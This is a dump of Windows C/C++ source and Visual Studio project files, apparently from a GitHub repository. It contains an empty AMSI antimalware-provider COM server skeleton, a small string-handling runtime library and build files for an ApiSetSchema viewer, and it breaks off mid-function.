6 | 7 | import "oaidl.idl"; 8 | import "ocidl.idl"; 9 | 10 | [ 11 | object, 12 | uuid(05025dfe-70d5-4b61-a55a-aa21585d4cb2), 13 | dual, 14 | nonextensible, 15 | pointer_default(unique) 16 | ] 17 | interface IAmsiProvider : IDispatch 18 | { 19 | }; 20 | [ 21 | uuid(508c88ef-ca97-4107-a022-6025892ef192), 22 | version(1.0), 23 | ] 24 | library AmsiScanLib 25 | { 26 | importlib("stdole2.tlb"); 27 | [ 28 | uuid(1c0643e1-5b0a-4420-9b76-0de9264b4c59) 29 | ] 30 | coclass AmsiProvider 31 | { 32 | [default] interface IAmsiProvider; 33 | }; 34 | }; 35 | 36 | import "shobjidl.idl"; 37 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rc -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | } 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {58d1c9d3-a7e5-4f1a-b441-007441745fe5} 18 | False 19 | 20 | 21 | 22 | 23 | Source Files 24 | 25 | 26 | Source Files 27 | 28 | 29 | Source Files 30 | 31 | 32 | Generated Files 33 | 34 | 35 | Source Files 
36 | 37 | 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files 44 | 45 | 46 | Header Files 47 | 48 | 49 | Header Files 50 | 51 | 52 | Generated Files 53 | 54 | 55 | Header Files 56 | 57 | 58 | 59 | 60 | Resource Files 61 | 62 | 63 | 64 | 65 | Resource Files 66 | 67 | 68 | Source Files 69 | 70 | 71 | Resource Files 72 | 73 | 74 | 75 | 76 | Source Files 77 | 78 | 79 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan_i.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the IIDs and CLSIDs */ 4 | 5 | /* link this file in with the server and any clients */ 6 | 7 | 8 | /* File created by MIDL compiler version 8.01.0622 */ 9 | /* at Mon Jan 18 19:14:07 2038 10 | */ 11 | /* Compiler settings for AmsiScan.idl: 12 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 13 | protocol : all , ms_ext, c_ext, robust 14 | error checks: allocation ref bounds_check enum stub_data 15 | VC __declspec() decoration level: 16 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 17 | DECLSPEC_UUID(), MIDL_INTERFACE() 18 | */ 19 | /* @@MIDL_FILE_HEADING( ) */ 20 | 21 | 22 | 23 | #ifdef __cplusplus 24 | extern "C"{ 25 | #endif 26 | 27 | 28 | #include 29 | #include 30 | 31 | #ifdef _MIDL_USE_GUIDDEF_ 32 | 33 | #ifndef INITGUID 34 | #define INITGUID 35 | #include 36 | #undef INITGUID 37 | #else 38 | #include 39 | #endif 40 | 41 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 42 | DEFINE_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) 43 | 44 | #else // !_MIDL_USE_GUIDDEF_ 45 | 46 | #ifndef __IID_DEFINED__ 47 | #define 
__IID_DEFINED__ 48 | 49 | typedef struct _IID 50 | { 51 | unsigned long x; 52 | unsigned short s1; 53 | unsigned short s2; 54 | unsigned char c[8]; 55 | } IID; 56 | 57 | #endif // __IID_DEFINED__ 58 | 59 | #ifndef CLSID_DEFINED 60 | #define CLSID_DEFINED 61 | typedef IID CLSID; 62 | #endif // CLSID_DEFINED 63 | 64 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 65 | EXTERN_C __declspec(selectany) const type name = {l,w1,w2,{b1,b2,b3,b4,b5,b6,b7,b8}} 66 | 67 | #endif // !_MIDL_USE_GUIDDEF_ 68 | 69 | MIDL_DEFINE_GUID(IID, IID_IAmsiProvider,0x05025dfe,0x70d5,0x4b61,0xa5,0x5a,0xaa,0x21,0x58,0x5d,0x4c,0xb2); 70 | 71 | 72 | MIDL_DEFINE_GUID(IID, LIBID_AmsiScanLib,0x508c88ef,0xca97,0x4107,0xa0,0x22,0x60,0x25,0x89,0x2e,0xf1,0x92); 73 | 74 | 75 | MIDL_DEFINE_GUID(CLSID, CLSID_AmsiProvider,0x1c0643e1,0x5b0a,0x4420,0x9b,0x76,0x0d,0xe9,0x26,0x4b,0x4c,0x59); 76 | 77 | #undef MIDL_DEFINE_GUID 78 | 79 | #ifdef __cplusplus 80 | } 81 | #endif 82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScanps.def: -------------------------------------------------------------------------------- 1 | 2 | LIBRARY 3 | 4 | EXPORTS 5 | DllGetClassObject PRIVATE 6 | DllCanUnloadNow PRIVATE 7 | DllRegisterServer PRIVATE 8 | DllUnregisterServer PRIVATE 9 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dlldata.c: -------------------------------------------------------------------------------- 1 | /********************************************************* 2 | DllData file -- generated by MIDL compiler 3 | 4 | DO NOT ALTER THIS FILE 5 | 6 | This file is regenerated by MIDL on every IDL file compile. 
7 | 8 | To completely reconstruct this file, delete it and rerun MIDL 9 | on all the IDL files in this DLL, specifying this file for the 10 | /dlldata command line option 11 | 12 | *********************************************************/ 13 | 14 | #define PROXY_DELEGATION 15 | 16 | #include 17 | 18 | #ifdef __cplusplus 19 | extern "C" { 20 | #endif 21 | 22 | EXTERN_PROXY_FILE( AmsiScan ) 23 | 24 | 25 | PROXYFILE_LIST_START 26 | /* Start of list */ 27 | REFERENCE_PROXY_FILE( AmsiScan ), 28 | /* End of list */ 29 | PROXYFILE_LIST_END 30 | 31 | 32 | DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID ) 33 | 34 | #ifdef __cplusplus 35 | } /*extern "C" */ 36 | #endif 37 | 38 | /* end of generated dlldata file */ 39 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Implementation of DllMain. 2 | 3 | #include "stdafx.h" 4 | #include "resource.h" 5 | #include "AmsiScan_i.h" 6 | #include "dllmain.h" 7 | 8 | CAmsiScanModule _AtlModule; 9 | 10 | // DLL Entry Point 11 | extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) 12 | { 13 | hInstance; 14 | return _AtlModule.DllMain(dwReason, lpReserved); 15 | } 16 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dllmain.h: -------------------------------------------------------------------------------- 1 | // dllmain.h : Declaration of module class. 
2 | 3 | class CAmsiScanModule : public ATL::CAtlDllModuleT< CAmsiScanModule > 4 | { 5 | public : 6 | DECLARE_LIBID(LIBID_AmsiScanLib) 7 | DECLARE_REGISTRY_APPID_RESOURCEID(IDR_AMSISCAN, "{508c88ef-ca97-4107-a022-6025892ef192}") 8 | }; 9 | 10 | extern class CAmsiScanModule _AtlModule; 11 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by AmsiScan.rc 4 | // 5 | #define IDS_PROJNAME 100 6 | #define IDR_AMSISCAN 101 7 | #define IDR_AMSIPROVIDER 106 8 | 9 | // Next default values for new objects 10 | // 11 | #ifdef APSTUDIO_INVOKED 12 | #ifndef APSTUDIO_READONLY_SYMBOLS 13 | #define _APS_NEXT_RESOURCE_VALUE 201 14 | #define _APS_NEXT_COMMAND_VALUE 32768 15 | #define _APS_NEXT_CONTROL_VALUE 201 16 | #define _APS_NEXT_SYMED_VALUE 107 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // AmsiScan.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, 3 | // but are changed infrequently 4 | 5 | #pragma once 6 | 7 | #ifndef STRICT 8 | #define STRICT 9 | #endif 10 | 11 | #include "targetver.h" 12 | 13 | #define 
_ATL_APARTMENT_THREADED 14 | 15 | #define _ATL_NO_AUTOMATIC_NAMESPACE 16 | 17 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit 18 | 19 | 20 | #define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW 21 | 22 | #include "resource.h" 23 | #include 24 | #include 25 | #include 26 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScanPS/AmsiScanPS.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {d4e6d057-7f5b-4186-9809-ee200840bfe8} 6 | False 7 | 8 | 9 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 10 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 11 | 12 | 13 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 14 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 15 | 16 | 17 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 18 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 19 | 20 | 21 | 22 | 23 | Source Files 24 | 25 | 26 | 27 | 28 | Generated Files 29 | 30 | 31 | Generated Files 32 | 33 | 34 | Generated Files 35 | 36 | 37 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScanPS/AmsiScanPS.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 
-------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiProviderServer", "AmsiProviderServer\AmsiProviderServer.vcxproj", "{1B740B58-E395-40B5-8345-1A7265DD727D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x64.ActiveCfg = Debug|x64 17 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x64.Build.0 = Debug|x64 18 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x86.ActiveCfg = Debug|Win32 19 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x86.Build.0 = Debug|Win32 20 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x64.ActiveCfg = Release|x64 21 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x64.Build.0 = Release|x64 22 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x86.ActiveCfg = Release|Win32 23 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {8796A7D2-69DC-4BD8-B6E9-779ACC6AE4CF} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/AmsiProviderServer.vcxproj.filters: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {5baab34b-228c-4014-a376-ce5e8f112526} 18 | 19 | 20 | 21 | 22 | Source Files 23 | 24 | 25 | minirtl 26 | 27 | 28 | Source Files 29 | 30 | 31 | minirtl 32 | 33 | 34 | minirtl 35 | 36 | 37 | minirtl 38 | 39 | 40 | minirtl 41 | 42 | 43 | minirtl 44 | 45 | 46 | 47 | 48 | Source Files 49 | 50 | 51 | 52 | 53 | Header Files 54 | 55 | 56 | Header Files 57 | 58 | 59 | Header Files 60 | 61 | 62 | Header Files 63 | 64 | 65 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/AmsiProviderServer.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/classfactory.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define _IOffset(Class, itf) ((UINT_PTR)&(((Class *)0)->itf)) 4 | #define IToClass(Class, itf, pitf) ((Class *)(((LPSTR)pitf)-_IOffset(Class, itf))) 5 | #define IToClassN(Class, itf, pitf) IToClass(Class, itf, pitf) 6 | 7 | typedef HRESULT(CALLBACK *LPFNCREATEINSTANCE)(IUnknown *pUnkOuter, REFIID riid, void **ppvObject); 8 | 9 | typedef struct _CClassFactory { 10 | const IClassFactoryVtbl *cf; 11 | const CLSID *pclsid; 12 | LPFNCREATEINSTANCE lpfnCreateInstance; 13 | } CClassFactory, *PCClassFactory; 14 | 15 | #define AMSI_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \ 16 | EXTERN_C const GUID DECLSPEC_SELECTANY 
name \ 17 | = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } } 18 | 19 | AMSI_DEFINE_GUID(CLSID_AmsiProvider, 0x1c0643e1, 0x5b0a, 0x4420, 0x9b, 0x76, 0x0d, 0xe9, 0x26, 0x4b, 0x4c, 0x59); 20 | AMSI_DEFINE_GUID(IID_AntimalwareProvider, 0xb2cabfe3, 0xfe04, 0x42b1, 0xa5, 0xdf, 0x08, 0xd4, 0x83, 0xd4, 0xd1, 0x25); 21 | 22 | 23 | STDAPI_(LONG) DllAddRef(); 24 | STDAPI_(LONG) DllRelease(); 25 | 26 | extern const CClassFactory g_clsmap[]; 27 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/exports.def: -------------------------------------------------------------------------------- 1 | 2 | LIBRARY 3 | 4 | EXPORTS 5 | DllGetClassObject PRIVATE 6 | DllCanUnloadNow PRIVATE 7 | DllRegisterServer PRIVATE 8 | DllUnregisterServer PRIVATE 9 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/global.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #if defined (_MSC_VER) 4 | #if (_MSC_VER >= 1900) //VS15, 17 etc 5 | #ifdef _DEBUG 6 | #pragma comment(lib, "vcruntimed.lib") 7 | #pragma comment(lib, "ucrtd.lib") 8 | #else 9 | #pragma comment(lib, "libucrt.lib") 10 | #pragma comment(lib, "libvcruntime.lib") 11 | #endif 12 | #endif 13 | #endif 14 | 15 | #include 16 | #include 17 | #include "minirtl/minirtl.h" 18 | 19 | extern HMODULE g_currentModule; 20 | extern LONG g_cRefDll; 21 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 
0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strend.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strend_a(const char *s) 4 | { 5 | if ( s==0 ) 6 | return 0; 7 | 8 | while ( *s!=0 ) 9 | s++; 10 | 11 | return (char *)s; 12 | } 13 | 14 | wchar_t *_strend_w(const wchar_t *s) 15 | { 16 | if ( s==0 ) 17 | return 0; 18 | 19 | while ( *s!=0 ) 20 | s++; 21 | 22 | return (wchar_t *)s; 23 | } 24 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strlen.c: -------------------------------------------------------------------------------- 
#include "rtltypes.h"

/*
 * _strlen_a - count the chars that precede the NUL terminator of s.
 *
 * A null pointer is reported as length 0. The scan has no upper bound, so s
 * must really be NUL-terminated.
 */
size_t _strlen_a(const char *s)
{
    const char *cur = s;

    if (s == 0)
        return 0;

    while (*cur != 0)
        cur++;

    return (cur - s);
}

/*
 * _strlen_w - wide-character counterpart of _strlen_a.
 *
 * The result is a count of wchar_t elements, not bytes.
 */
size_t _strlen_w(const wchar_t *s)
{
    const wchar_t *cur = s;

    if (s == 0)
        return 0;

    while (*cur != 0)
        cur++;

    return (cur - s);
}
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
/* Fallback definitions for builds where the CRT headers did not provide them. */
#ifndef _WCHAR_T_DEFINED
typedef unsigned short wchar_t;
#define _WCHAR_T_DEFINED
#endif /* _WCHAR_T_DEFINED */

#ifndef _SIZE_T_DEFINED
#ifdef _WIN64
typedef unsigned __int64 size_t;
#else /* _WIN64 */
typedef __w64 unsigned int size_t;
#endif /* _WIN64 */
#define _SIZE_T_DEFINED
#endif /* _SIZE_T_DEFINED */

/* Fold 'A'..'Z' to lower case; every other value is returned unchanged. */
__forceinline char locase_a(char c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (char)(c + 0x20) : c;
}

/* Wide variant of locase_a; only the ASCII range 'A'..'Z' is folded. */
__forceinline wchar_t locase_w(wchar_t c)
{
    return ((c >= 'A') && (c <= 'Z')) ? (wchar_t)(c + 0x20) : c;
}

/*
 * Absolute value of a char.
 * NOTE(review): the result is narrowed back to char, so the most negative
 * char value has no positive counterpart and cannot be represented.
 */
__forceinline char byteabs(char x) {
    return (x < 0) ? -x : x;
}

/* Nonzero when x is one of '0'..'9'. */
__forceinline int _isdigit_a(char x) {
    return ((x >= '0') && (x <= '9'));
}

/* Nonzero when x is one of L'0'..L'9'. */
__forceinline int _isdigit_w(wchar_t x) {
    return ((x >= L'0') && (x <= L'9'));
}
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/u64tohex.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * u64tohex_a - format x as exactly 16 upper-case hex digits, zero padded.
 *
 * Returns 16 in every case. With s == 0 nothing is written. Otherwise s[0..15]
 * receive the digits and s[16] the terminator: the buffer must hold at least
 * 17 chars, and the function has no way to check that.
 */
size_t u64tohex_a(unsigned long long x, char *s)
{
    size_t pos;
    char nib;

    if (s == 0)
        return 16;

    /* Fill right to left: the lowest nibble lands in s[15]. */
    for (pos = 16; pos > 0; pos--) {
        nib = (char)(x & 0xf);
        x >>= 4;
        s[pos - 1] = (nib < 10) ? (char)(nib + '0') : (char)('A' + (nib - 10));
    }

    s[16] = 0;
    return 16;
}

/*
 * u64tohex_w - wide-character counterpart of u64tohex_a.
 *
 * s must have room for 17 wchar_t elements (16 digits plus terminator).
 */
size_t u64tohex_w(unsigned long long x, wchar_t *s)
{
    size_t pos;
    wchar_t nib;

    if (s == 0)
        return 16;

    for (pos = 16; pos > 0; pos--) {
        nib = (wchar_t)(x & 0xf);
        x >>= 4;
        s[pos - 1] = (nib < 10) ? (wchar_t)(nib + L'0') : (wchar_t)(L'A' + (nib - 10));
    }

    s[16] = 0;
    return 16;
}
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/ultohex.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * ultohex_a - format the low eight nibbles of x as 8 upper-case hex digits.
 *
 * Returns 8 in every case. With s == 0 nothing is written. Otherwise s[0..7]
 * receive the digits and s[8] the terminator: the buffer must hold at least
 * 9 chars, and the function has no way to check that.
 */
size_t ultohex_a(unsigned long x, char *s)
{
    size_t pos;
    char nib;

    if (s == 0)
        return 8;

    /* Fill right to left: the lowest nibble lands in s[7]. */
    for (pos = 8; pos > 0; pos--) {
        nib = (char)(x & 0xf);
        x >>= 4;
        s[pos - 1] = (nib < 10) ? (char)(nib + '0') : (char)('A' + (nib - 10));
    }

    s[8] = 0;
    return 8;
}

/*
 * ultohex_w - wide-character counterpart of ultohex_a.
 *
 * s must have room for 9 wchar_t elements (8 digits plus terminator).
 */
size_t ultohex_w(unsigned long x, wchar_t *s)
{
    size_t pos;
    wchar_t nib;

    if (s == 0)
        return 8;

    for (pos = 8; pos > 0; pos--) {
        nib = (wchar_t)(x & 0xf);
        x >>= 4;
        s[pos - 1] = (nib < 10) ? (wchar_t)(nib + L'0') : (wchar_t)(L'A' + (nib - 10));
    }

    s[8] = 0;
    return 8;
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/1.manifest:
--------------------------------------------------------------------------------
1 | 2 | 3 | 9 | ApiSetSchemaView 10 | 11 | 12 | 13 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 40 | 41 | 42 | 43 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/ApiSetSchemaView.sln:
-------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28010.2048 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ApiSetSchemaView", "ApiSetSchemaView.vcxproj", "{91352FD7-5569-4D5D-8677-735C8925A3B8}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Debug|x64.ActiveCfg = Debug|x64 15 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Debug|x64.Build.0 = Debug|x64 16 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Release|x64.ActiveCfg = Release|x64 17 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Release|x64.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {82481A72-5B56-4EC1-98A9-64BB64B2BCDA} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /source/ApiSetSchema/ApiSetSchemaView.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | false 5 | 6 | -------------------------------------------------------------------------------- /source/ApiSetSchema/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/ApiSetSchema/Resource.rc -------------------------------------------------------------------------------- /source/ApiSetSchema/icon_gears.ico: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/ApiSetSchema/icon_gears.ico
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcat.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * _strcat_a - append the NUL-terminated string src to the end of dest.
 *
 * Returns dest unchanged when either pointer is null. Otherwise the return
 * value points at the new terminator of dest, not at its start, so appends
 * can be chained without rescanning.
 *
 * There is no destination-size parameter: the caller must guarantee that dest
 * has room for both strings plus the terminator, otherwise the copy runs past
 * the end of the buffer. _strncpy_a in this directory takes explicit sizes.
 */
char *_strcat_a(char *dest, const char *src)
{
    char *tail;

    if ((dest == 0) || (src == 0))
        return dest;

    /* Seek to the current terminator of dest. */
    for (tail = dest; *tail != 0; tail++)
        ;

    /* Only src's own terminator stops this copy. */
    for (; *src != 0; src++, tail++)
        *tail = *src;

    *tail = 0;
    return tail;
}

/*
 * _strcat_w - wide-character counterpart of _strcat_a.
 *
 * Same contract and the same caveat: the capacity of dest is never checked.
 */
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *tail;

    if ((dest == 0) || (src == 0))
        return dest;

    for (tail = dest; *tail != 0; tail++)
        ;

    for (; *src != 0; src++, tail++)
        *tail = *src;

    *tail = 0;
    return tail;
}
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcmpi.c:
--------------------------------------------------------------------------------
#include "rtltypes.h"

/*
 * _strcmpi_a - case-insensitive comparison of two NUL-terminated strings.
 *
 * Returns 0 when the pointers are identical, -1 when only s1 is null and 1
 * when only s2 is null. Otherwise returns the difference of the first pair of
 * folded characters that differ, or 0 when both strings end together.
 *
 * Folding is done by locase_a (rtltypes.h), which maps 'A'..'Z' only. The
 * operands are plain char, so the sign of the result for bytes >= 0x80
 * follows the signedness of char.
 */
int _strcmpi_a(const char *s1, const char *s2)
{
    char a, b;

    if (s1 == s2)
        return 0;

    if (s1 == 0)
        return -1;

    if (s2 == 0)
        return 1;

    for (;;) {
        a = locase_a(*s1++);
        b = locase_a(*s2++);
        if ((a == 0) || (a != b))
            break;
    }

    return (int)(a - b);
}

/*
 * _strcmpi_w - wide-character counterpart of _strcmpi_a.
 *
 * Folding is done by locase_w, which also maps only 'A'..'Z'; other letters
 * that differ in case compare as different.
 */
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
{
    wchar_t a, b;

    if (s1 == s2)
        return 0;

    if (s1 == 0)
        return -1;

